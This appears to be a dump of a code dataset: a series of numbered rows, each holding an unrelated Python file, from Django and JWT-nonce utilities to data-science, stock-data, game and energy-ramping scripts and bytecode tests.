# defined earlier in this file (outside this excerpt) — confirm their contracts.
nested_dict={}
START=0
END=0
current_pos=(START, END)
ID=''
# Walk TEs in the order given by getnu; a TE starting beyond the current
# container's end opens a new container, otherwise it is recorded as nested.
for id, pair in sorted(sepe_dict.items(), key=getnu):
    '''[ ( id,(xx,xx)), ...]'''
    start=pair[0]
    end=pair[1]
    START=current_pos[0]
    END=current_pos[1]
    if start > END:
        # New top-level (container) TE; it also indexes itself in its own sub-dict.
        current_pos=(start, end)
        ID=id
        nested_dict[ID] = {}
        if ID not in nested_dict[ID].keys():
            nested_dict[ID][ID] = {}
        nested_dict[ID][ID] = (start, end)
    elif start>= START and end <= END:
        # Fully contained in the current container: record as nested.
        if id not in nested_dict[ID].keys():
            nested_dict[ID][id]={}
        nested_dict[ID][id]=(start, end)
##step 3: find the single TE and other nested TEs in the big nested TEs.
final_total_dict={}
## used to carry all the finished TEs
for nested in nested_dict.keys():
    for query_id, query in nested_dict[nested].items():
        final_pos_list=[]
        ## within each nested TE
        START = query[0]
        END = query[1]
        # '0' marks positions belonging to this TE; positions covered by a
        # strictly-inner TE are flipped to '1' by change().
        seq='0'*(END-START+1)
        for sb_id, sb_pair in nested_dict[nested].items():
            start = sb_pair[0]
            end = sb_pair[1]
            if start > START and end< END:
                ## changing the seq within the [start : end] into '1'.
                seq=change(seq, START, END, start, end)
        ## transform the number string into position pairs
        try:
            pair_list=transform(seq, START, END)
        except:
            print('transform error!')
        else:
            for pair_tu in pair_list:
                try:
                    start_nu=pair_tu[0]
                    end_nu=pair_tu[1]
                except:
                    print('error final number')
                else:
                    final_pos_list.append(str(start_nu)+'..'+str(end_nu))
        final_pos_list=','.join(sorted(final_pos_list, key=getnumber))
        #final_list=query_id.split('\t').append(final_pos_list)
        index=(query_id.split('\t')[1])
        final_list=query_id.split('\t')
        final_list.append(final_pos_list)
        #'\t'.join(final_list)
        final_list='\t'.join(final_list)
        final_total_dict[index] = final_list
        #print(final_list)
### outputing the file
#output_file=open('final_version_TEs2/'+'Emmer_'+tag+'_TE.formated','w')
#for index in sorted(final_total_dict.keys(), key=getIDnum):
#    output_file.write(final_total_dict[index]+'\n')
#    print(final_total_dict[index])
#output_file.close()
|
13,156 | 548797889c978ebd4195a8cca39d642107192ba0 | """
Helpful utility functions
"""
from __future__ import unicode_literals
import six
import random
import time
import base64
import re
from datetime import datetime, timedelta
from dateutil import parser, tz
import logging
logger = logging.getLogger(__name__)
def to_bytes(data):
    """Return *data* UTF-8 encoded when it is a text string, else unchanged."""
    text_type = unicode if six.PY2 else str
    if isinstance(data, text_type):
        return data.encode('utf-8')
    return data
def to_string(data):
    """Return *data* as a text string, UTF-8 decoding it when it is bytes."""
    text_type = unicode if six.PY2 else str
    if isinstance(data, text_type):
        return data
    return data.decode('utf-8')
def base64url_encode(msg):
    """
    URL-safe base64 encode without padding.

    Default b64_encode adds padding; the JWT spec removes it.
    :param msg: data to encode
    :type msg: string or bytes
    :return: unpadded URL-safe base64 encoding
    :rtype: bytes
    """
    padded = base64.urlsafe_b64encode(to_bytes(msg))
    # Strip the '=' padding characters, returning bytes as before.
    return to_bytes(to_string(padded).replace('=', ''))
def base64url_decode(msg):
    """
    Decode unpadded URL-safe base64 (JWT style).

    The JWT spec strips '=' padding; restore it before handing the
    message to the standard decoder.
    :param msg: URL safe base64 message
    :type msg: string or bytes
    :return: decoded data
    :rtype: bytes
    """
    bmsg = to_bytes(msg)
    remainder = len(bmsg) % 4
    if remainder:
        bmsg += b'=' * (4 - remainder)
    return base64.urlsafe_b64decode(bmsg)
def make_nonce():
    """
    Create a nonce with an embedded UTC timestamp.

    Layout: '001' + 'YYYY-mm-ddTHH:MM:SSZ' + 6 random ASCII
    alphanumeric characters (29 characters total).
    :return: nonce string
    """
    time_component = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
    # All ASCII alphanumerics. str.isalnum() already covers isalpha(),
    # so the old `isalpha() or isalnum()` test was redundant.
    valid_chars = ''.join(chr(i) for i in range(128) if chr(i).isalnum())
    # SystemRandom draws from the OS CSPRNG — appropriate for nonces.
    random_chr = random.SystemRandom()
    random_str = ''.join(random_chr.choice(valid_chars) for _ in range(6))
    return '001{time_str}{random_str}'.format(time_str=time_component,
                                              random_str=random_str)
def verify_and_burn_nonce(nonce):
    """
    Ensure that the nonce is well-formed, less than one hour old,
    and not more than two minutes in the future.

    Callers should also store used nonces and reject messages
    with previously-used ones.
    :param nonce: Nonce as created with :func:`~oneid.utils.make_nonce`
    :return: truthy only if nonce meets validation criteria
    :rtype: bool
    """
    pattern = (r'^001[2-9][0-9]{3}-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01])'
               r'T([01][0-9]|2[0-3])(:[0-5][0-9]){2}Z[A-Za-z0-9]{6}$')
    ret = re.match(pattern, nonce)
    if ret:
        # Strip the '001' prefix and the 6 random suffix chars, parse the stamp.
        stamp = parser.parse(nonce[3:-6])
        now = datetime.utcnow().replace(tzinfo=tz.tzutc())
        ret = (now + timedelta(hours=-1)) < stamp < (now + timedelta(minutes=2))
    return ret  # TODO: keep a record (at least for the last hour) of burned nonces
|
13,157 | c17f44f328689d9ea19fed3024ea3137304bf1af | # Generated by Django 3.1 on 2020-09-11 06:56
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 3.1): adds the optional ``tenure_for_ROI``
    # char field to the FundFarm model.

    dependencies = [
        ('hamrokheti_home', '0004_auto_20200911_1229'),
    ]

    operations = [
        migrations.AddField(
            model_name='fundfarm',
            name='tenure_for_ROI',
            # blank/null allowed so existing rows need no backfill
            field=models.CharField(blank=True, max_length=10, null=True),
        ),
    ]
|
13,158 | d737e899fca1ff5a4a6259745042d403f7f7bf92 | # argv[0]: Output file name.
# argv[2]: Template file name. Template file must be in templates dir.
# argv[3]: Tag(branch) name.
import sys, os
from jinja2 import Environment, FileSystemLoader

# Render a Jinja2 template with a tag/branch name and write the result.
# CLI: argv[1] = output file name, argv[2] = template file name
# (under templates/), argv[3] = tag (branch) name passed to the template.
template_dir = 'templates'
# Templates are resolved relative to this script's own directory.
env = Environment(loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), template_dir)))
template = env.get_template(sys.argv[2])
output_from_template = template.render(tag_name=sys.argv[3])
# to save the results (written next to this script, UTF-8 encoded)
with open(os.path.join(os.path.dirname(__file__), sys.argv[1]), "wb") as fh:
    fh.write(bytes(output_from_template, 'UTF-8'))
13,159 | 977fdbed24614b508bf4ffea420b8b493a95e1b9 | import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, precision_score, r2_score, recall_score
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import mean_squared_error, r2_score
import matplotlib.pyplot as plt
import numpy as np
import textwrap
from sklearn.ensemble import GradientBoostingClassifier
# NOTE(review): X and y are not defined anywhere in this module — as written
# this line raises NameError at import time; they must be loaded/defined first.
X_train, X_test, y_train, y_test = train_test_split(X, y)
# X is X_train, y is y_train
def get_model_errors(model, X, y):
    """Return (accuracy, precision, recall) of *model* evaluated on X, y."""
    predictions = model.predict(X)
    return (accuracy_score(y, predictions),
            precision_score(y, predictions),
            recall_score(y, predictions))
def Gradient_Boosting_Classifier(X, y, learning_rate, n_estimators):
    """Fit and return a GradientBoostingClassifier with a fixed random_state."""
    clf = GradientBoostingClassifier(learning_rate=learning_rate,
                                     n_estimators=n_estimators,
                                     random_state=1)
    clf.fit(X, y)
    return clf
# grad_model = Gradient_Boosting_Classifier(X_train, y_train, 0.1, 100)
# accuracy, precision, recall = get_model_errors(grad_model, X_train, y_train)
# returns R^2, MSE
def MSE_R2(model):
    """Cross-validated scores of *model* on the module-level X_train / y_train.

    Returns (mean R^2, mean MSE). MSE is recovered from sklearn's
    'neg_mean_squared_error' scorer by taking the absolute value.
    """
    r_squared = cross_val_score(model, X_train, y_train).mean()
    mse = abs(cross_val_score(model, X_train, y_train,
                              scoring='neg_mean_squared_error').mean())
    return r_squared, mse
13,160 | 6e506bfd660db54f31a26ea99e30b38a3394bb1a | import itertools
# Find the largest integer obtainable by concatenating the numbers in some order.
# The original built each candidate with repeated string += (quadratic) and
# materialized all n! permutations in a list it never needed; a single max()
# over a generator does the same work in one pass.
test = [5, 2, 1, 9, 50, 56]
temp = max(int("".join(str(n) for n in perm))
           for perm in itertools.permutations(test))
print(temp)
13,161 | a3ce327a8a2f16d006735c14568d8704f7608149 | from django.urls import path
from transfer.api.views import TransferCreateAPIView, TransferDownloadAPIView, TransferStatisticsAPIView
# Transfer API routes (relative to this app's URL prefix).
urlpatterns = [
    path('create/', TransferCreateAPIView.as_view()),         # create a new transfer
    path('statistics/', TransferStatisticsAPIView.as_view()), # aggregate transfer stats
    path('download/<slug:url_hash>', TransferDownloadAPIView.as_view()),  # fetch by hash
]
|
13,162 | 25982563aae0c1802876dcb67f91185ece25697e | # __author__ = Chen Meiying
# -*- coding: utf-8 -*-
# 2019/3/15 9:39
# 整理数据:在dataset1中加上涨跌幅
# 记住要改三个地方!!
import numpy as np
import pandas as pd
import h5py
dates = [ '20050401','20050501', '20050601', '20050701', '20050801', '20050901', '20051001', '20051101', '20051201', '20060101', '20060201', '20060301', '20060401', '20060501', '20060601', '20060701', '20060801', '20060901', '20061001', '20061101', '20061201', '20070101', '20070201', '20070301', '20070401', '20070501', '20070601', '20070701', '20070801', '20070901', '20071001', '20071101', '20071201', '20080101', '20080201', '20080301', '20080401', '20080501', '20080601', '20080701', '20080801', '20080901', '20081001', '20081101', '20081201', '20090101', '20090201', '20090301', '20090401', '20090501', '20090601', '20090701', '20090801', '20090901', '20091001', '20091101', '20091201', '20100101', '20100201', '20100301', '20100401', '20100501', '20100601', '20100701', '20100801', '20100901', '20101001', '20101101', '20101201', '20110101', '20110201', '20110301', '20110401', '20110501', '20110601', '20110701', '20110801', '20110901', '20111001', '20111101', '20111201', '20120101', '20120201', '20120301', '20120401', '20120501', '20120601', '20120701', '20120801', '20120901', '20121001', '20121101', '20121201', '20130101', '20130201', '20130301', '20130401', '20130501', '20130601', '20130701', '20130801', '20130901', '20131001', '20131101', '20131201', '20140101', '20140201', '20140301', '20140401', '20140501', '20140601', '20140701', '20140801', '20140901', '20141001', '20141101', '20141201', '20150101', '20150201', '20150301', '20150401', '20150501', '20150601', '20150701', '20150801', '20150901', '20151001', '20151101', '20151201', '20160101', '20160201', '20160301', '20160401', '20160501', '20160601', '20160701', '20160801', '20160901', '20161001', '20161101', '20161201', '20170101', '20170201', '20170301', '20170401', '20170501', '20170601', '20170701', '20170801', '20170901', '20171001', '20171101', '20171201', '20180101', '20180201', '20180301', '20180401', '20180501', '20180601', '20180701', '20180801', '20180901', '20181001', '20181101', '20181201']
# k:20150102 - 20181228
# for i in range(165):
# f = h5py.File("D:\Meiying\data\part1_modified.h5", 'r') # 打开h5文件
# store_path = r"D:\Meiying\data\cleaned\\" + dates[i][:6] + ".h5"
# store = pd.HDFStore(store_path, 'w', complevel=4, complib='blosc')
# for k in f.keys():
# if k < dates[i]: continue
# if k >= dates[i+1]: break #每一个月写一个文件
# # 对于某一天
# # count = 0
# h = pd.read_hdf("D:\Meiying\data\part1_modified.h5", key=str(k))
# df = pd.DataFrame(h)
# df['open'] = np.nan
# df['close'] = np.nan
# df['pre_close'] = np.nan
# df['change'] = np.nan
# df['high'] = np.nan
# df['low'] = np.nan
# df['vol'] = np.nan
# df['amount'] = np.nan
# df['pct_chg'] = np.nan
# df.index = df['ts_code'] # 用股票代码重命名行
# for code in df['ts_code']:
# f2 = h5py.File("D:\Meiying\data\dataset_part5.h5", 'r') # 打开h5文件
# for key in f2.keys():
# if code == key:
# h2 = pd.read_hdf("D:\Meiying\data\dataset_part5.h5", key=str(key))
# df2 = pd.DataFrame(h2)
# # print(df2)
# for date in df2["trade_date"]:
# if date == str(k):
# row = df2[df2['trade_date'].isin([str(k)])]
# # index = code # index是在1中的索引
# # index = row.index.values[0] # index是在5中的索引
# df.at[code, "open"] = float(row["open"])
# df.at[code, "close"] = float(row["close"])
# df.at[code, "pre_close"] = float(row["pre_close"])
# df.at[code, "change"] = float(row["change"])
# df.at[code, "high"] = float(row["high"])
# df.at[code, "low"] = float(row["low"])
# df.at[code, "vol"] = float(row["vol"])
# df.at[code, "amount"] = float(row["amount"])
# df.at[code,"pct_chg"] = float(row["pct_chg"])
# # print(code)
# # print(df)
# df.drop("ts_code", axis=1,inplace=True) # 删除多余的ts_code列
# # 把每天的数据写入一个h5表
# store[k] = df
# print(str(k) + " done")
# store.close()
# print(dates[i][:6] + " done")
f = h5py.File("D:\Meiying\data\part1_modified.h5", 'r')  # open the h5 source (one key per trade date)
store_path = r"D:\Meiying\data\cleaned\labeled.h5"
store = pd.HDFStore(store_path, 'w', complevel=4, complib='blosc')
for k in f.keys():
    if k < '20181201': continue
    if k >= '20190101': break  # one file per month: only December 2018 here
    # For a single trading day k: start from the part1 rows and attach
    # OHLC / volume / pct_chg columns looked up from part5.
    # count = 0
    h = pd.read_hdf("D:\Meiying\data\part1_modified.h5", key=str(k))
    df = pd.DataFrame(h)
    df['open'] = np.nan
    df['close'] = np.nan
    df['pre_close'] = np.nan
    df['change'] = np.nan
    df['high'] = np.nan
    df['low'] = np.nan
    df['vol'] = np.nan
    df['amount'] = np.nan
    df['pct_chg'] = np.nan
    df.index = df['ts_code']  # re-index rows by stock code
    for code in df['ts_code']:
        f2 = h5py.File("D:\Meiying\data\dataset_part5.h5", 'r')  # open the per-stock h5 source
        for key in f2.keys():
            if code == key:
                h2 = pd.read_hdf("D:\Meiying\data\dataset_part5.h5", key=str(key))
                df2 = pd.DataFrame(h2)
                # print(df2)
                for date in df2["trade_date"]:
                    if date == str(k):
                        row = df2[df2['trade_date'].isin([str(k)])]
                        # index = code  # index within part1
                        # index = row.index.values[0]  # index within part5
                        df.at[code, "open"] = float(row["open"])
                        df.at[code, "close"] = float(row["close"])
                        df.at[code, "pre_close"] = float(row["pre_close"])
                        df.at[code, "change"] = float(row["change"])
                        df.at[code, "high"] = float(row["high"])
                        df.at[code, "low"] = float(row["low"])
                        df.at[code, "vol"] = float(row["vol"])
                        df.at[code, "amount"] = float(row["amount"])
                        df.at[code, "pct_chg"] = float(row["pct_chg"])
        # print(code)
    # print(df)
    df.drop("ts_code", axis=1, inplace=True)  # drop the now-redundant ts_code column
    # write each day's labeled table into the store under its date key
    store[k] = df
    print(str(k) + " done")
store.close()
print("201812 done")
# next step (elsewhere): drop rows with missing values and concatenate the tables
13,163 | b35116cae92c10ec561058dd28a2ba735b3c3b1f | import pygame
import enum
class GunMenu(enum.Enum):
    # Weapon-selection menu images, pre-scaled to the 160x50 menu slot.
    # NOTE(review): the images are loaded at import time, so pygame must be
    # able to load PNGs (and the Pics/ path must exist) before this module
    # is imported — confirm init order.
    BAZOOKA = pygame.transform.scale(pygame.image.load('Pics/GunMenu/FirstChosen.png'), (160, 50))
    GRENADE = pygame.transform.scale(pygame.image.load('Pics/GunMenu/SecondChosen.png'), (160, 50))
    HOLYBOMB = pygame.transform.scale(pygame.image.load('Pics/GunMenu/ThirdChosen.png'), (160, 50))
|
13,164 | 1457e0ba5ca548245751e215105c55cfa54cb660 | class Block:
    def __init__(self, value, next_block):
        # Singly-linked list node: a payload plus a reference to the next node
        # (None when this is the tail).
        self.value = value
        self.next = next_block
class Queue:
    """FIFO queue built from singly-linked Block nodes."""

    def __init__(self):
        # Empty queue: no head (first) and no tail (last).
        self.first = None
        self.last = None

    def collect(self):
        """Return the queued values, front to back, as a list."""
        values = []
        node = self.first
        while node is not None:
            values.append(node.value)
            node = node.next
        return values

    def push(self, x):
        """Append *x* at the back of the queue."""
        node = Block(x, None)
        if self.first is None:
            # Queue was empty: the new node becomes the head too.
            self.first = node
        else:
            self.last.next = node
        self.last = node

    def pop(self):
        """Remove and return the front value, or None if the queue is empty."""
        if self.first is None:
            return None
        value = self.first.value
        self.first = self.first.next
        if self.first is None:
            # Just removed the only node; clear the tail as well.
            self.last = None
        return value
# Manual smoke test: interleave push/pop and print the queue contents each step.
q = Queue()
print(q.collect())
q.push(1)
print(q.collect())
print(q.pop())
print(q.collect())
q.push(1)
q.push(2)
q.push(3)
print(q.collect())
print(q.pop())
print(q.collect())
print(q.pop())
print(q.collect())
q.push(4)
q.push(5)
print(q.collect())
print(q.pop())
print(q.collect())
13,165 | 1349b2fa8d24365f3393006abe52c4fa982ca436 | import os.path
import shutil
import pickle
import urllib.request
import zipfile
import datetime
import numpy as np
import pandas as pd
from io import BytesIO
import os
import sys
import subprocess
import re
from urllib.request import urlopen
from energy_constraint import *
# Startup banner with wall-clock time, to gauge overall runtime.
print('Begin script ' + str(datetime.datetime.now().time()))
# --------- Settings --------- #
pd.set_option('display.max_columns', 70)
np.set_printoptions(precision=4, threshold=20)
export_all = False  # when True, intermediate per-column ramp tables would be exported
# --------- Functions --------- #
def load_pickle(name):
    """Load and return the object stored in '<name>.pkl'."""
    with open('{0}.pkl'.format(name), 'rb') as fh:
        return pickle.load(fh)
def save_pickle(contents, name):
    """Pickle *contents* to '<name>.pkl' at the highest protocol."""
    with open('{0}.pkl'.format(name), 'wb') as out:
        pickle.dump(contents, out, pickle.HIGHEST_PROTOCOL)
def get_rps(df, rps_state):
    """Look up a state's RPS renewable-energy fraction and target year.

    *df* must be indexed by state abbreviation with columns 'RPS RE%'
    and 'Year'. States without an RPS (KeyError on lookup) yield
    (nan, nan); Texas is reported as handled elsewhere.
    """
    try:
        print('RPS for ' + rps_state)
        print(df.loc[rps_state])
        re_frac = df.loc[rps_state, 'RPS RE%']
        rps_yr = df.loc[rps_state, 'Year']
    except KeyError:
        re_frac = float('nan')
        rps_yr = float('nan')
        if rps_state == 'TX':
            print('Texas requires 10,000 MW of renewable capacity by 2025, this will be handled elsewhere in the '
                  'script.\n')
        else:
            print('State does not have an RPS, assume constant mix of renewable energy sources.')
    return re_frac, rps_yr
# Case under analysis. NOTE(review): `region` is re-assigned again further
# down (after the commented-out exploration), so this value is a default only.
state='AZ'
region='Southwest'
# case_list = pd.read_excel('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/Case_List.xlsx')
# states = case_list.groupby(['State']).count()
# # states.apply(lambda x: x['State'].set_index())
# # # states.reset_index(inplace=True)
# print(states)
# state_data = pd.read_excel('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/State_Data.xlsx', index_col=0,
# header=[0, 1])
# state_data = state_data.loc[state]
# # state_data.reset_index(inplace=True)
# print(state_data)
#
# rps_frac = state_data.loc['RPS', 'Target']
# print('target rps fraction is: ' + str(rps_frac))
# l_matrix = pd.read_csv('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/L.csv')
num_hours = 5  # how many top net-load hours to keep
ramp_ran = 5   # ramping window length, in hours
region = 'Southwest'
def idxmax(s, w):
    """Yield the index label of the maximum of each length-*w* sliding window of *s*."""
    for start in range(len(s) - w + 1):
        yield s.iloc[start:start + w].idxmax()
future_net_8760 = load_pickle('/Users/gglazer/PycharmProjects/CEP1/data/future_net_8760_pickle')
all_EU = load_pickle('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/all_EU')
all_RE = load_pickle('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/all_RE')
# Per-region end-use (EU) and renewable (RE) matrices, re-indexed 0..N-1.
eu_matrix = all_EU[region].reset_index()
eu_matrix.sort_index(inplace=True)
eu_matrix.drop(columns='index', inplace=True)
re_matrix = all_RE[region].reset_index()
solar_list = ['Solar_Tracking', 'Solar_Fixed']
# ## things to make 'self'
# change re_matrix to self.re
# change ramp_ran to self.ramp_ran
# re_hours = re_matrix.copy()
max_ramp = pd.DataFrame()  # NOTE(review): assigned but never used below — confirm before removing
def calc_ramping(cols):
    # For each RE column in `cols`, find the hour with the steepest drop
    # relative to the rolling maximum over the previous `ramp_ran` hours.
    # Relies on module-level globals: re_matrix, ramp_ran, idxmax.
    # NOTE(review): max_ramp_tracking / max_ramp_fixed are only bound when
    # cols contains 'Solar_Tracking' / 'Solar_Fixed'; any other cols list
    # raises NameError at the return — confirm intended usage.
    for col in cols:
        re_hours = re_matrix.copy()
        # Rolling max over the window and the hour it occurred at.
        re_hours['Rolling Max ' + col] = re_hours[col].rolling(window=ramp_ran).max()
        re_hours['First Hour ' + col] = pd.Series(idxmax(re_matrix[col], ramp_ran), re_hours.index[ramp_ran-1:])
        re_hours.fillna(0, inplace=True)
        re_hours['First Hour ' + col] = re_hours['First Hour ' + col].astype(int)
        # Delta <= 0: drop from the window's peak down to the current hour.
        re_hours['Delta ' + col] = re_hours[col] - re_hours['Rolling Max ' + col]
        re_hours['Num Hours ' + col] = re_hours.index - re_hours['First Hour ' + col]
        # if export_all:
        #     re_hours.to_csv()
        if col == 'Solar_Fixed':
            max_ramp_fixed = re_hours.loc[re_hours['Delta ' + col] == min(re_hours['Delta ' + col])]
        if col == 'Solar_Tracking':
            max_ramp_tracking = re_hours.loc[re_hours['Delta ' + col] == min(re_hours['Delta ' + col])]
    return max_ramp_tracking, max_ramp_fixed
# if (max_ramp_fixed.index.values).astype(int) == 6736:
#     print((max_ramp_fixed.index.values).astype(int))
#     print('poopy')
# Unpack the worst-case ramp rows for tracking and fixed PV.
[max_tracking, max_fixed] = calc_ramping(solar_list)
# change [max_fixed] to self.max_fixed
def find_flex_value(matrix, source, pv_type='fixed'):
    # A_flex entry for `source`: change in matrix[source] between the
    # worst-ramp hour and the hour the solar window maximum occurred.
    # Relies on module-level max_fixed / max_tracking from calc_ramping().
    # NOTE(review): a pv_type other than 'fixed'/'tracking' leaves `value`
    # unbound and raises UnboundLocalError at the return — confirm callers.
    if pv_type == 'fixed':
        value = matrix[source][max_fixed.index.values].values - \
            matrix[source][max_fixed.index.values - max_fixed['Num Hours Solar_Fixed']].values
    if pv_type == 'tracking':
        value = matrix[source][max_tracking.index.values].values - \
            matrix[source][max_tracking.index.values - max_tracking['Num Hours Solar_Tracking']].values
    return value
# A_flex values for PVs (positive magnitude of the worst solar drop)
a_fixed = -max_fixed['Delta Solar_Fixed'].values
a_track = -max_tracking['Delta Solar_Tracking'].values
# A_flex values for wind sources
a_wind_fix = find_flex_value(re_matrix, 'Wind', 'fixed')
a_wind_tra = find_flex_value(re_matrix, 'Wind', 'tracking')
a_windoff_fix = find_flex_value(re_matrix, 'Wind_Offshore', 'fixed')
a_windoff_tra = find_flex_value(re_matrix, 'Wind_Offshore', 'tracking')
# A_flex values for energy storage (4h / 6h, fixed / tracking)
# NOTE(review): constants — presumably placeholder flexibility credits; confirm.
a_es4f = 2
a_es4t = 2
a_es6f = 2
a_es6t = 2
# A_flex values for energy efficiency
a_ee_fix = eu_matrix.iloc[max_fixed.index.values, :].values - \
    eu_matrix.iloc[max_fixed.index.values - max_fixed['Num Hours Solar_Fixed'], :].values
a_ee_tra = eu_matrix.iloc[max_tracking.index.values, :].values - \
    eu_matrix.iloc[max_tracking.index.values - max_tracking['Num Hours Solar_Tracking'], :].values
# A_flex values for demand response
a_dr_fix = eu_matrix.iloc[max_fixed.index.values, :].values
a_dr_tra = eu_matrix.iloc[max_tracking.index.values, :].values
# subtr = eu_matrix.iloc[max_fixed.index.values - max_fixed['Num Hours Solar_Fixed'], :].values
# Row 0: fixed-PV scenario; row 1: tracking-PV scenario.
A_flex = [[a_fixed, 0, a_wind_fix, a_windoff_fix, a_es4f, a_es6f, a_ee_fix, a_dr_fix],
          [0, a_track, a_wind_tra, a_windoff_tra, a_es4t, a_es6t, a_ee_tra, a_dr_tra]]
A_flex = np.asarray(A_flex)
print(A_flex)
# print(A_flex)
# np.savetxt('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/a_flex.csv', A_flex, delimiter=',')
# solar_fixed = re_matrix['Solar_Fixed'].tolist()
# print(solar_fixed[:15])
# print(len(solar_fixed))
# first_delta = solar_fixed[1:] - solar_fixed[0:len(solar_fixed)-1]
# max_delta = []
# max_index = []
# for i in range(ramp_ran, len(solar_fixed)):
# max_delta[i] = solar_fixed[i] - max(solar_fixed[(i-ramp_ran):i])
# max_index[i] = max(solar_fixed[(i-ramp_ran):i]).index
# print(max_delta[:15])
# print(max_delta.shape)
# print(max_index[:15])
# print(max_index.shape)
# print(re_matrix.head())
# print(eu_matrix.head())
# print(re_matrix.head())
# print(future_net_8760)
# # Find top hour of added load
# maxes = future_net_8760.sort_values('Delta', ascending=False)
# max_hour = maxes.iloc[[0]]
# del maxes
# # Sort by net load, keep top hours, add in max hour of added load
# fut_sorted = future_net_8760.sort_values(['Net Load'], ascending=False)
# fut_sorted = fut_sorted[:num_hours]
# fut_sorted = pd.concat([max_hour, fut_sorted])
# fut_sorted.reset_index(inplace=True)
# # Count how many times each day appears in top hours
# fut_sorted['MonthDay'] = fut_sorted[['Month', 'Day']].apply(''.join, axis=1)
# counts = fut_sorted[['MonthDay']]
# counts = counts.groupby(by=['MonthDay'])['MonthDay'].agg('count')
# counts = counts.to_frame()
# counts.rename(columns={'MonthDay': 'Counts'}, inplace=True)
# counts.reset_index(inplace=True)
# fut_sorted = pd.merge(fut_sorted, counts, how='left', on=['MonthDay'])
# # Merge RE, EU matrices into the top hours for net load constraint
# fut_sorted.set_index('index', inplace=True)
# fut_sorted = fut_sorted.merge(re_matrix, how='left', left_index=True, right_index=True)
# fut_sorted = fut_sorted.merge(eu_matrix, how='left', left_index=True, right_index=True)
# print(fut_sorted)
# fut_sorted.to_csv('/Users/gglazer/PycharmProjects/CEP1/data/fut_sorted.csv')
# print(counts)
#
# # Indexing for months
# Jan = 0
# Feb = Jan + 31*24
# Mar = Feb + 28*24
# Apr = Mar + 31*24
# May = Apr + 30*24
# Jun = May + 31*24
# Jul = Jun + 30*24
# Aug = Jul + 31*24
# Sep = Aug + 31*24
# Oct = Sep + 30*24
# Nov = Oct + 31*24
# Dec = Nov + 30*24
# #
# months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
# # months = list(range(1, 13))
# re_8760s = pd.ExcelFile('/Users/gglazer/PycharmProjects/CEP1/data/RE.xlsx', usecols='A:E').parse('Midwest')
# L_matrix = pd.DataFrame(data=0, index=re_8760s.index, columns=months)
# L_matrix['Datetime'] = L_matrix.index
# for month in months:
# # print(L_matrix[month])
# L_matrix[month].loc[L_matrix['Time'].dt.month == month] = 1
# if L_matrix['Datetime'].month == 1:
# L_matrix['Jan'] = 1
#
# L = np.zeros((8760, 12))
# months = [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]
# for i in range(len(months)):
# if i == 11:
# L[months[i]:, i] = np.ones((1, len(L)-months[i])).astype(int)
# else:
# L[months[i]:months[i+1], i] = np.ones((1, months[i+1]-months[i])).astype(int)
# # print(L.T.dot(L))
# # np.savetxt('/Users/gglazer/PycharmProjects/RMI/L.csv', L, delimiter=',')
# save_pickle(L, '/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/L')
# print(L)
#
# re_8760s = pd.ExcelFile('/Users/gglazer/PycharmProjects/CEP1/data/RE.xlsx', usecols='A:E')
# save_pickle(re_8760s, '/Users/gglazer/PycharmProjects/CEP1/data/pickles/re_8760s_pickle')
# print(df_norm_renewable_cap)
# LHSConstraints('West')
|
13,166 | 48c7cbb922d8fa63dd759b27d7f4a09e7eb12cc1 | #!/usr/bin/env python
#######################################################################################
########### Used to spawn different car modules #######################################
#######################################################################################
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import subprocess
# Launch each car module in the background, forwarding the three CLI args
# (their exact meaning is defined by the binaries — confirm against their docs).
# subprocess.Popen with an argument *list* avoids the shell word-splitting /
# injection risks of the previous os.system string concatenation, and it
# returns immediately, matching the old "&" backgrounding.
module_args = sys.argv[1:4]
for binary in ("../bin/CarCluster", "../bin/CarSpeed", "../bin/CarGPS",
               "../bin/DCA", "../bin/TaskD"):
    subprocess.Popen([binary] + module_args)
|
13,167 | 4d81f9fd95cb285139f7a2febae1ab8f6cf26d42 | import rejig.pybytecode
from rejig.syntaxtree import *
def check(what_is, what_should_be):
    """Round-trip *what_is* through CPython bytecode and assert that
    rejig.pybytecode.ast reconstructs it as *what_should_be*.

    The snippet is wrapped in a synthetic function ``f``: statement-like
    input is pasted in as the function body, while a bare expression
    becomes the function's return value.
    """
    global failed, total
    env = {}
    # Heuristic statement detection: newlines, assignments, nested defs, or
    # print calls cannot appear inside a plain ``return <expr>`` wrapper.
    statement_markers = ("\n", " = ", "def ", "print(")
    if any(marker in what_is for marker in statement_markers):
        body = "\n ".join(what_is.split("\n"))
        exec("def f():\n " + body, env)
    else:
        exec("def f():\n return " + what_is, env)
    ast = rejig.pybytecode.ast(env["f"])
    print(str(ast))
    assert ast == what_should_be, "\nshould be: " + repr(what_should_be) + "\nyet it is: " + repr(ast)
check('"hello"', Suite((Call('return', Const('hello')),)))
check('''.3''', Suite((Call('return', Const(.3)),)))
check('''-3''', Suite((Call('return', Const(-3)),)))
check('''--3''', Suite((Call('return', Const(--3)),)))
check('''+3''', Suite((Call('return', Const(+3)),)))
check('''++3''', Suite((Call('return', Const(++3)),)))
check('''+-3''', Suite((Call('return', Const(+-3)),)))
check('''3e1''', Suite((Call('return', Const(3e1)),)))
check('''-3e1''', Suite((Call('return', Const(-3e1)),)))
check('''+3e1''', Suite((Call('return', Const(+3e1)),)))
check('0x123', Suite((Call('return', Const(0x123)),)))
check('0o123', Suite((Call('return', Const(0o123)),)))
check('3+4j', Suite((Call('return', Const(3+4j)),)))
